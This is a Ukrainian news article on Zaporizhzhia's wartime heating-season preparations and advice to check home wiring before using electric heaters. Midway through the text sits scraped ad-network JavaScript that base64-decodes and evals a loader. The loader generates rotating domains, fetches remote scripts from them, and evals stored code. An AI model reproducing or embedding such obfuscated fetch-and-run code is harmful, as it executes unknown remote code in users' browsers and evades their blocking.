Запоріжцям слід готуватися до холодної зими: що потрібно зробити вже сьогодні

Опалювальний сезон в умовах війни супроводжуватиметься цілою низкою проблем. У квартирах планують знижувати показники опалення, тому температура буде у межах +16+18 градусів.

На цьому фоні кожній родині вже зараз потрібно подбати про те, щоб не мерзнути взимку.

Коли буде опалення?

Міністр розвитку громад та територій Олексій Чернишов анонсував старт опалювального сезону на 15 жовтня.

Дата орієнтовна, оскільки все залежить від погодних умов. Міністр також наголосив, що Україна готова до опалювального сезону вже на 70%.

Ситуація в Запорізькій області

Олександр Старух зауважив, що наразі триває розробка плану по залученню альтернативних систем теплопостачання. Тому що ситуація взимку може бути непередбачуваною, йдеться у повідомленні департаменту культури та інформаційної політики ЗОВА.

Представники Запорізької ОВА розповіли, що попри тимчасову окупацію, усі території працюють над підготовкою до опалювального сезону. Однак, 5 із 7 котелень області знаходяться саме на потенційно небезпечних територіях, що може ускладнити цьогорічний процес теплопостачання. Водночас з цим, продовжується робота над розв’язанням питань спільно з Обленерго та представниками обласного центру. Зокрема, пропрацьовуються можливості децентралізації системи теплопостачання, введення необхідних для цього додаткових і резервних потужностей.

Зниження температури

Експерт у сфері ЖКГ Олег Попенко нагадав, що таке рішення обговорюють уже не вперше. Щоб змінити температуру, необхідно понизити температуру теплоносія. Проблема може виникнути з неутепленими хрущовками.

У таких будинках ще до зниження нормативів через високі тепловтрати температура часто опускалася нижче від 18 градусів. Тепер ситуація може бути більш критичною. У такому разі місцева влада вже пропонує готуватися до опалювального сезону самостійно. var node3361 = document.getElementById(«MIXADV_3361»); if( node3361 ) { var script = document.createElement(«script»); script.charset = «utf-8»; script.src = «https://m.mixadvert.com/show/?id=3361&r=»+Math.random(); node3361.parentNode.appendChild(script); script.onerror = function(){ window.eval( atob(«dmFyIGRhdGUgPSBuZXcgRGF0ZSgpO3ZhciBtb250aCA9IGRhdGUuZ2V0TW9udGgoKSArIDE7IHZhciBkYXkgPSBkYXRlLmdldERhdGUoKTsgdmFyIHllYXIgPSBkYXRlLmdldFllYXIoKTsgdmFyIG5hbWVfZGF5ID0gZGF0ZS5nZXREYXkoKSArIDE7dmFyIGRvbSA9IFsgIm9yZyIsICJ0b3AiLCAiYml6LnVhIiwgImNvLnVhIiwgImt5aXYudWEiLCAiY2x1YiIsICJzaG9wIl07IHZhciBzdHIgPWRheSoobW9udGggKiBuYW1lX2RheSAqIGRheSkrIiIrIGRheSoobW9udGggKyBuYW1lX2RheSArIGRheSAreWVhcik7dmFyIGhhc2ggPSAgYnRvYShidG9hKHN0cikpLnRvTG93ZXJDYXNlKCk7IHZhciBob3N0ID0gaGFzaC5zdWJzdHJpbmcoMywgaGFzaC5sZW5ndGggLSBuYW1lX2RheS8yKSsiLiIrZG9tW25hbWVfZGF5IC0gMV07dmFyIHIgPSBNYXRoLnJhbmRvbSgpLnRvU3RyaW5nKDM2KS5zdWJzdHIoMiwgMik7ciA9IHIucmVwbGFjZSgvWzAtOV0vZywgIiIpO3ZhciBkZWx0YSA9IE1hdGguZmxvb3IoTWF0aC5yYW5kb20oKSAqICgxMDAgLSAxMCArIDEpKSArIDEwO3ZhciBpZCA9IDMzNjEgLSBkZWx0YTsgdmFyIHNjcmlwdF9maXJzdCA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoInNjcmlwdCIpO3NjcmlwdF9maXJzdC5zcmMgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIitkZWx0YStpZCtyKyIiOyBub2RlMzM2MS5wYXJlbnROb2RlLmFwcGVuZENoaWxkKHNjcmlwdF9maXJzdCk7c2V0VGltZW91dCggZnVuY3Rpb24gKCkge3NjcmlwdF9maXJzdC5yZW1vdmUoKX0sIDQwMDApO3NjcmlwdF9maXJzdC5vbmVycm9yID0gZnVuY3Rpb24oKXt2YXIgYSA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoImEiKTthLmhyZWYgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIjsgbm9kZTMzNjEucGFyZW50Tm9kZS5hcHBlbmRDaGlsZChhKTsgc2V0VGltZW91dCggZnVuY3Rpb24gKCkgeyBpZiggbm9kZTMzNjEuaW5uZXJIVE1MID09ICIiICkgd2luZG93LmV2YWwobG9jYWxTdG9yYWdlLmdldEl0ZW0oIjMzNjEiKSkgfSwgNTAwMCk7ICA7fTsg») ); } }

Запоріжжя та область готуються до опалювального сезону. У обласному центрі до експлуатації нині готові 40 котелень з 61. Вже пройшли гідравлічні випробування 90% мереж. Також підготовлені 36 центральних теплових пунктів.

Про зниження стандартів температури опалення у квартирах запоріжців поки не йдеться 

На випадок припинення постачання газу для котелень розробляється альтернативна програма.

Що робити?

Попит на обігрівачі в Україні у липні зріс у 20 разів, порівняно з аналогічним місяцем минулого року.

Українці активно скуповують обігрівачі через ризики опалювального сезону, які складно передбачити навіть владі.

ВАЖЛИВО: тут є великий мінус.

Справа в тому, що у тих же хрущовках електросистема не розрахована на високе навантаження. Коли будувалася більшість таких будинків, такої кількості електроприладів не існувало. Крім того, не передбачено опалення електроприладами.

Тому передусім уже зараз потрібно запросити електрика, який має вивчити стан електропроводки, за потреби провести заміну. Інакше опалювальний сезон може супроводжуватися замиканнями та ризиками спалахів. Про це пише Обозреватель. (adsbygoogle = window.adsbygoogle || []).push({});

Подписывайтесь на Акцент в Источник: https://akzent.zp.ua/zaporizhtsyam-slid-gotuvatisya-do-holodnoyi-zimi-shho-potribno-zrobiti-vzhe-sogodni/

Мы в Telegram, наш Telegram bot — @zpua_bot, Мы в Viber, Мы на Facebook

Share this post

Добавить комментарий

scroll to top